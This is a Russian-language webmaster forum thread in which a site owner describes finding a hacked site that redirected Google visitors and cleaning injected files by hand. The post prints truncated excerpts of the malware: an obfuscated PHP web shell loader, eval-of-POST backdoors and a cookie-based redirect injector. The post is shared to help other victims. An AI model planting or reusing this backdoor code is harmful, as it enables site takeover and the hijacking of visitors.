[Denis Creative]

Ну тогда вариантов много)
Если можно в личку скиньте адрес сайта и запросы по которым вы переходили с Гугла на 404 ошибку, может тогда что-то и придумаем

[dollar-plus]

Проблему решил.

Начал ковыряться дальше и обнаружил одну хрень! С поисковика гугла в эксплорере и в хроме выкидывает на страницу http://www.google.com/Sorry ,а в любимой мазиле выкинуло сюда: klast-narm.ru/wptwitt?3

Таки, видимо заразу подцепили. Где дырка, сразу не нашёл. По логам ФТП вроде чисто.

Самое интересное, что с закладок и с других поисковиков проблем с переходами нет. Да и сам сайт загружается как обычно.

Короче, в корне сайта нашёл сторонний файл index.php.html. Антивирь орал как резаный. Еле удалил. Потом оказалось, что во всех папках сайта с файлами index.html появились заражённые файлы index.php. с вредоносным кодом. Код был и в верхней части некоторых файлах php и в др.. И практически во всех файлах в корне сайта. Намучался конкретно. Знаю есть прога для чистки этой дряни, но мнение о ней двоякое. Решил сделать ручками. Задолбался, но вычистил.

Сайт заработал нормально, трафик с гугла пошёл...
Дырку, похоже, нашёл и закрыл.

Вот часть кода этой дряни:


global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo if(isset($_GET[w7412t])){ $auth_pass="";$color="#df5";$default_action="Files Man";$default_use_ajax=true;$default_charset="Wind ows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x 61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65 \x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNk Wf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4 XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3X vj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9f
........... p0FcRY6Xhl3hvUOaKT8rGB4XV7E+nxx2YoqcHx0eQG1p9ZwTMS llb7thFV5WiicmdET3qyuIYbU4Agjc9lmCpzzk5MCOz70Hc58T 0t3hQDOX2hQeV7fCeoLNq9ulb+iR9awo80ZtZXK2r56dUYJbQg Dn2wbjvy2c5cgh8gAi9LbaFz7lC13SwzDxAYT72vwA='\x29\x 29\x29\x3B",".");exit; }

ещё:

$vf=substr(1,1);foreach(array(10,100,111,99,117,10 9,101,110,116,46,103,101,116,69,108,101,109,101,11 0,116,66,121,73,100,40,39,80,104,112,79,117,116,11 2,117,116,39,41,46,115,116,121,108,101,46,100,105, 115,112,108,97,121,61,39,39,59,100,111,99,117,109, 101,110,116,46,103,101,116,69.............if(isset ($_GET[$vj[6]])){$vj[7]=0;if(isset($_POST[chr(97)])){$vj[7]=$_POST[chr(97)];}$vj[8]=chr(97).chr(106).chr(97).chr(120);$vj[9]=0;if(isset($_POST[$vj[8]])){$vj[9]=$_POST[$vj[8]];}if($vj[7]==substr($vj[1],79,3)&&strlen($vj[9])==4){@ob_start();@eval($_POST[$vj[4]]);$vj[6]=$vj[1].addcslashes(htmlspecialchars(@ob_get_clean()),$vj[3]).$vj[2];echo strlen($vj[6]).$vj[0].$vj[6];}else{$vj[0]=chr(116).chr(120);if(!isset($_POST[$vj[0]])){echo $vj[5];}else{@eval(urldecode($_POST[$vj[0]]));}}exit;}unset($vf);unset($vj);?>

И ещё:

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_ f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo ..............content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43), $_POST[$sessdt_p])));exit;} }





Специально пишу это для тех, у кого могут быть подобные проблемы, чтобы не мучались как я, а сразу нашли ответ в поисковике.

Всем, кто откликнулся, спасибо за помощь!

P.S. Не могу понять зачем у меня просили адрес сайта, если проблему описал подробно. Любопытство или что?